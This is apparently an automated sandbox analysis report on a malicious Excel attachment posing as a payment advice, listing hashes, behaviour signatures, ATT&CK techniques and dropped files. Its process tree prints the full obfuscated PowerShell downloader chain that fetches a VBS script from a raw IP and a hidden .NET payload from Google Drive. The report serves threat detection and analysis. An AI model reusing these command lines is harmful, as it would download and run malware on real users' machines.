b0cd17647fc69ec21565ca141e88795eaf36084fb4d179198e988ab449d46483

Analysis

max time kernel
121s
max time network
126s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06-11-2024 08:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment Advice-RefA22D4YdWsbE5.xls
Size

645KB
MD5

a9a9c2318ac29160ece850c60e6b7aa6
SHA1

67701eb4f6813927c5262edf55d9943146f521a2
SHA256

b0cd17647fc69ec21565ca141e88795eaf36084fb4d179198e988ab449d46483
SHA512

c5db07d40516e468835e827fbf9643a442c4ebbd0c2941c97f4d00010fbe66b032be8a1fcdf568515f727810a7d7f0bf0c2707ac40a20c55616fb72c85166c1c
SSDEEP

12288:UbWNHd0zBRlrOiVNYNPPg1O+R8G7kN/eTXjWxMyPg+8FlX0iv6p:8sd4rrV6NP41ttkN2TQXbEb

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	1992	mshta.exe
11	1992	mshta.exe
13	2116	PoWErSHEll.EXe
15	2108	powershell.exe
17	2108	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
568	powershell.exe
2108	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2116	PoWErSHEll.EXe
2784	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PoWErSHEll.EXe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWErSHEll.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2984	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2116	PoWErSHEll.EXe
2784	powershell.exe
2116	PoWErSHEll.EXe
2116	PoWErSHEll.EXe
568	powershell.exe
2108	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2116	PoWErSHEll.EXe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2984	EXCEL.EXE
2984	EXCEL.EXE
2984	EXCEL.EXE
2984	EXCEL.EXE
2984	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1992 wrote to memory of 2116	1992	mshta.exe	32
PID 1992 wrote to memory of 2116	1992	mshta.exe	32
PID 1992 wrote to memory of 2116	1992	mshta.exe	32
PID 1992 wrote to memory of 2116	1992	mshta.exe	32
PID 2116 wrote to memory of 2784	2116	PoWErSHEll.EXe	34
PID 2116 wrote to memory of 2784	2116	PoWErSHEll.EXe	34
PID 2116 wrote to memory of 2784	2116	PoWErSHEll.EXe	34
PID 2116 wrote to memory of 2784	2116	PoWErSHEll.EXe	34
PID 2116 wrote to memory of 1208	2116	PoWErSHEll.EXe	35
PID 2116 wrote to memory of 1208	2116	PoWErSHEll.EXe	35
PID 2116 wrote to memory of 1208	2116	PoWErSHEll.EXe	35
PID 2116 wrote to memory of 1208	2116	PoWErSHEll.EXe	35
PID 1208 wrote to memory of 1268	1208	csc.exe	36
PID 1208 wrote to memory of 1268	1208	csc.exe	36
PID 1208 wrote to memory of 1268	1208	csc.exe	36
PID 1208 wrote to memory of 1268	1208	csc.exe	36
PID 2116 wrote to memory of 680	2116	PoWErSHEll.EXe	37
PID 2116 wrote to memory of 680	2116	PoWErSHEll.EXe	37
PID 2116 wrote to memory of 680	2116	PoWErSHEll.EXe	37
PID 2116 wrote to memory of 680	2116	PoWErSHEll.EXe	37
PID 680 wrote to memory of 568	680	WScript.exe	38
PID 680 wrote to memory of 568	680	WScript.exe	38
PID 680 wrote to memory of 568	680	WScript.exe	38
PID 680 wrote to memory of 568	680	WScript.exe	38
PID 568 wrote to memory of 2108	568	powershell.exe	40
PID 568 wrote to memory of 2108	568	powershell.exe	40
PID 568 wrote to memory of 2108	568	powershell.exe	40
PID 568 wrote to memory of 2108	568	powershell.exe	40

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Payment Advice-RefA22D4YdWsbE5.xls"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2984

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Windows\SysWOW64\WinDOwsPOWeRSHEll\V1.0\PoWErSHEll.EXe
  "C:\Windows\sySTEm32\WinDOwsPOWeRSHEll\V1.0\PoWErSHEll.EXe" "pOWERSHeLl.exE -Ex ByPasS -noP -W 1 -c DEvICeCreDENtIalDePLoyMENt.EXE ; iex($(IeX('[sySTem.tEXT.enCODING]'+[ChaR]58+[ChaR]0X3A+'utf8.GEtSTrIng([SYsTeM.CONveRt]'+[Char]0X3a+[char]58+'FrOMbaSE64sTrING('+[CHaR]0x22+'JFlzRURKSE91ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUmRFZkluaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5BbnNpKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS1ZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5vS2phdURuVEQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhmaFVXbUR6WlIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVIVyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIll2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKcFlOUHYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFlzRURKSE91OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My40LjIzLzY2L3NlZXRoZWJlc3R0aGluZ3N3aXRobWVncmVhdHdpdGhlbnRpcmVsaWZld2l0aGdvb2R0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRobWVncmVhdHdpdGhlbnRpcmVsaWZld2l0aGdvb2R0aC52YnMiLDAsMCk7U3RBcnQtU2xlZVAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRobWVncmVhdHdpdGhlbnRpcmVsaWZld2l0aGdvb2R0aC52YnMi'+[cHAR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -noP -W 1 -c DEvICeCreDENtIalDePLoyMENt.EXE
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2784
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r2zyox41.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1208
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CD6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8CC5.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1268
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithmegreatwithentirelifewithgoodth.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:680
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd4WDZpbWEnKydnZVVybCA9IEYzVGh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9lJysneHBvcnQ9JysnZG93bmxvYWQmaWQnKyc9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwJysnIEYzVDt4WDZ3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZW50O3hYNmltJysnYWdlQnl0ZScrJ3MgPSB4WDZ3ZWJDbGllbnQuRG93bmxvYWREYXRhKCcrJ3hYNmltYWdlVXJsJysnKTt4WDZpbWFnZVRleHQgPSBbU3lzdCcrJ2VtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh4WDZpbWFnZScrJ0J5dGVzKTt4JysnWDZzdGFydEZsYWcgPSBGM1Q8PEJBU0U2NF9TVEFSVD4+RjNUO3hYNmVuZEZsYWcgPSBGM1Q8PEJBU0U2NF9FTkQ+PkYzVDt4WDZzdGFydEluZGV4ID0geFg2aW1hZ2VUZXgnKyd0LkluZGV4T2YoeFg2c3RhcnRGbGFnKTt4WDZlbmRJbmRleCA9IHhYNmltYWdlVGV4dC5JbmRleE9mKHhYNmVuZEZsYWcpO3hYNnN0YXJ0SW5kZXggLWdlIDAgLWFuZCB4WDZlbmRJbmRleCAtZ3QgeFg2cycrJ3RhcnRJbmRleDt4JysnWDZzdGFydEluZGV4ICs9IHhYNnN0YScrJ3J0RmxhZy5MZW5ndGg7eFg2YicrJ2FzZTY0TGVuZ3RoID0geFg2ZW5kSW5kZXggLSB4WDZzdGFydEluZGV4O3hYNmJhc2U2NENvbW0nKydhbmQgPSB4WDZpbWFnZVQnKydleHQuU3Vic3RyaW5nKHhYNnN0YXJ0SW5kZXgnKycsICcrJ3hYNmJhc2U2NExlbmd0aCk7eFg2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoeFg2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFluViBGb3JFYWNoLU9iamVjdCB7IHhYNl8nKycgfScrJylbLTEuLi0oeFg2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTt4WDZjbycrJ21tYScrJ25kQnl0ZXMgPSBbU3lzJysndGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHhYNmJhc2U2NFJldmVyc2VkKTt4WDZsJysnb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWJseV06OkxvYWQoeFg2Y29tbWFuZEJ5dGVzKTt4JysnWDZ2YWlNZScrJ3Rob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TScrJ2V0aG9kKEYnKyczVFZBSUYzVCk7eFg2dmFpTWV0aG9kLkludm9rZSh4WDZudWxsLCBAKEYzVHR4dC5MRVNTQUMvJysnNjYvMzIuNC4zNzEuNzAxLy86cHR0aEYzVCwgRjNUZGVzYXRpJysndmFkb0YzVCwgRjNUZGVzYXRpdmFkb0YzVCwgRjNUZGVzYXRpdmFkb0YzVCwgRjNUYXNwbmV0X2NvbXBpbGVyRjNULCBGM1RkZXNhdGl2YWRvRjNULCBGM1RkZXNhdGl2YWRvJysnRjNULEYzVGRlc2F0aXZhZG9GM1QsRjNUZGVzYScrJ3RpdmFkb0YzVCxGM1RkZXNhdGl2YWRvRjNULEYzVCcrJ2Rlc2F0aXZhZG9GM1QsRjNUZGVzYXRpdmFkb0YzVCxGM1QxRjNULEYzVGRlc2F0aXZhZG9GM1QpKTsnKS5yRXBMQWNlKChbQ2hBUl0xMjArW0NoQVJdODgrW0NoQVJdNTQpLFtTVHJpTmddW0NoQVJdMzYpLnJFcExBY2UoJ1luVicsW1NUcmlOZ11bQ2hBUl0xMjQpLnJFcExBY2UoJ0YzVCcsW1NUcmlOZ11bQ2hBUl0zOSkgfCYgKCAkU2hFTExJZFsxXSskc2hlbGxpRFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:568
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('xX6ima'+'geUrl = F3Thttps://drive.google.com/uc?e'+'xport='+'download&id'+'=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0'+' F3T;xX6webClient = New-Object System.Net.'+'WebClient;xX6im'+'ageByte'+'s = xX6webClient.DownloadData('+'xX6imageUrl'+');xX6imageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(xX6image'+'Bytes);x'+'X6startFlag = F3T<<BASE64_START>>F3T;xX6endFlag = F3T<<BASE64_END>>F3T;xX6startIndex = xX6imageTex'+'t.IndexOf(xX6startFlag);xX6endIndex = xX6imageText.IndexOf(xX6endFlag);xX6startIndex -ge 0 -and xX6endIndex -gt xX6s'+'tartIndex;x'+'X6startIndex += xX6sta'+'rtFlag.Length;xX6b'+'ase64Length = xX6endIndex - xX6startIndex;xX6base64Comm'+'and = xX6imageT'+'ext.Substring(xX6startIndex'+', '+'xX6base64Length);xX6base64Reversed = -join (xX6base64Command.ToCharArray() YnV ForEach-Object { xX6_'+' }'+')[-1..-(xX6base64Command.Length)];xX6co'+'mma'+'ndBytes = [Sys'+'tem.Convert]::FromBase64String(xX6base64Reversed);xX6l'+'oadedAssembly = [System.Refl'+'ection.Assembly]::Load(xX6commandBytes);x'+'X6vaiMe'+'thod = [dnlib.IO.Home].GetM'+'ethod(F'+'3TVAIF3T);xX6vaiMethod.Invoke(xX6null, @(F3Ttxt.LESSAC/'+'66/32.4.371.701//:ptthF3T, F3Tdesati'+'vadoF3T, F3TdesativadoF3T, F3TdesativadoF3T, F3Taspnet_compilerF3T, F3TdesativadoF3T, F3Tdesativado'+'F3T,F3TdesativadoF3T,F3Tdesa'+'tivadoF3T,F3TdesativadoF3T,F3T'+'desativadoF3T,F3TdesativadoF3T,F3T1F3T,F3TdesativadoF3T));').rEpLAce(([ChAR]120+[ChAR]88+[ChAR]54),[STriNg][ChAR]36).rEpLAce('YnV',[STriNg][ChAR]124).rEpLAce('F3T',[STriNg][ChAR]39) |& ( $ShELLId[1]+$shelliD[13]+'x')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
d009fc7866198d366783f955d444a1e4

SHA1
2bd27c52cd6afbe54c83704eb08ce4b779716632

SHA256
ce300f9b90e4fd779078f6d09cc7208b2ec75468d59981ec3838490e2320efcd

SHA512
dd168067fe422aaeb4222b902bf6772f14e16b37da69dbcf2182b618c26d256102cd09a8e0e62b360a22575ad3e379c724400f1a858f8d0402e66fae2502899f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
77b858d08b306f9f337c71eb7026416b

SHA1
3983d2ee96cdb6728fdc52d5e93b398d51e92a28

SHA256
e565b3cb4a264d606f8e859cc98181a82d4b450fc06c35faa7374755e16a3bb3

SHA512
927d9644670b8e3573da20c5c47b0a837ce7eefe2caf032893358f1f2c78cfccdbfcc917ca059b03610b3337996d12be949c8f624a54a5a507da89b367fa0307

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
0eaf8a7bdab43b0caa5ac22b29a0fd59

SHA1
0c6523aba85a17b7dab3142c3ea38749512e9707

SHA256
31ce515165935245c834ca702bd8aedfa5c15e9a456fbd040f53bdf17a820cfb

SHA512
df78c60a62f664cdd10387d9194a9a836573c38bead1fe51a0f64f292c1519ac23bd28e8bfd3d9b2507340afd580ac7defb55e69ff1eb18f5a0429c5c4fa5444

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\createdbestthingswithentirelifewithgoodfeaturesareonhere[1].hta

Filesize
8KB

MD5
1d89b649a7d2ef26d72b4f11633a9017

SHA1
d48edb474f7594dff6ed36a10a1825b5d9e111d7

SHA256
de7a97009148d8c2937d5c322973fb8c35406bb94d898abd88cbff4cf0d2b237

SHA512
6f0ec1654fe2b88e7973b5f992933aa1cd88092fa0379efb7da709a22280615d4761a49476c7c36d06167a06949be1c3753d4dbc206f098a218bad92262cfe1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab80E3.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8CD6.tmp

Filesize
1KB

MD5
5285a0935ab65992489ea79ab06ee0a1

SHA1
820d9042bd302c77e11f93abae8cb3eee3ac4933

SHA256
6661bbd2f45acc1cec683ea67c467a4ac98274f006147d4aeffedff1a92fe143

SHA512
ec5f3d2f8f8b43c9ab87f2d15c81fcd9b15bc5945ffa3502d9790a019e78801edc3f45e3a77365924e405739805aa0f245ddce74f01af237f54f4f2a094787a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\r2zyox41.dll

Filesize
3KB

MD5
f9ba8b37de7ded834647fbd562b2482f

SHA1
2a99300cae33641b6a2e15f8d62f63bd12843525

SHA256
9075c449e2838f014f6d399df087abf2dff4989e080ababf2fd4b335a63eb90b

SHA512
2477633b12804d0b301a1a646289635869e69883e47dd83f134e931960dc775b8c9f0e7f149bba64d4ed793462242277ffbd247f48a2c6486620ae614e7280f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\r2zyox41.pdb

Filesize
7KB

MD5
c525bbedb4eab3e2644e26a093f9e148

SHA1
8bacca78749cd76cc7b8f44519c5fde14683dca0

SHA256
4edc7bdbe717a7a9a19ee38813cae9fd74e488802fd5fd1c8664b22e1a3c6148

SHA512
619205e60c9f74857ac0cf5b0c0c370650b717077ae814ab33ea18c288801667eec139fafa5f0aa6d6ed2fbf7307cce0d65c101fb5173a8a9cbe54e4c06498e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
2d04f7670240c3f1d14645dcc2d83564

SHA1
82b4536a9004acf0065926d9fde1f87def6503f4

SHA256
abd8cd1723097890f6ba3546e83cc2f6a9f570c6b9c5cd1d33397fae29fff41f

SHA512
a6584c28dc281970e80f9d9a14187fa1098f9451175bd56dcd40aea8661fa7aed14fcb1b17beac9699054189628867ba783e53bda866d7185ed90e551d3d85a1

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingswithmegreatwithentirelifewithgoodth.vbs

Filesize
138KB

MD5
4bbb30fded9fd12bffb37261d39e8139

SHA1
31b47da89bcba90315661300076b567f6682f33b

SHA256
2ba56dfa938b61c01b9c3db3ff37f975af3cd3a883aae027feb6d59537d0f72e

SHA512
e8a5e561bbd94b9439d11b7d2e161c036610754fbca5dafbbee830ae8703714d1e7b86da1e257e485cdf942651991452516561e9ed242f61b93729e623cb7b92

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8CC5.tmp

Filesize
652B

MD5
6e45f044da5459f24dd863319132a258

SHA1
94c59b4dc973c0fafc3c6d731bdbef4c449ba838

SHA256
3c6c6d1a6f969b62955e88a6b89c87980d5eba9c74210f6287fc851cefeb6c0b

SHA512
34d18c4bbedbdf3d5b23e8b987eddc47d29017b1d085f8dcb8be94cd3fb900d12a45d7f18e74f710f3c1ed93219f9d2c7d2d46ecfdeca841eb367e8b7458f840

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r2zyox41.0.cs

Filesize
467B

MD5
20f1899a90d8d923e72108e6375f7f61

SHA1
a4208600d31f73bbd9698c7c8136415a1462f2f5

SHA256
8a577d1ab0482d3828f19fceffb2f1bab9b17aa96f8673e6ba0892eb36330ed4

SHA512
7c70f145982ba48be956c1aa11b0a638bd8a8f0cf1e5d41f117943efcff94281f00519f0dff67d8e30857765ef1404160b0cc9105bd7f76c6ce81722e507ebc1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r2zyox41.cmdline

Filesize
309B

MD5
fa00ec26cf64a034b643ec3a55c1582b

SHA1
5c2c2c2c9b1477032ba66485dd8998bf72182479

SHA256
d6b2e0cca73e7e37359bfcfe99ccaa0a4e56467f3610c1591c2869cff74a6a98

SHA512
8e4e8c07fc0e98bdbbfba220fec61e31aafdfc6ee7b4ee36ab83af107877c4eaa649ca0221bc85efda97291f71db8f3dc5738e57562bdcd130a89fb61870b920

Download Submit
memory/1992-18-0x0000000002430000-0x0000000002432000-memory.dmp

Filesize
8KB

Download
memory/2984-19-0x0000000001E00000-0x0000000001E02000-memory.dmp

Filesize
8KB

Download
memory/2984-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2984-1-0x000000007254D000-0x0000000072558000-memory.dmp

Filesize
44KB

Download
memory/2984-77-0x000000007254D000-0x0000000072558000-memory.dmp

Filesize
44KB

Download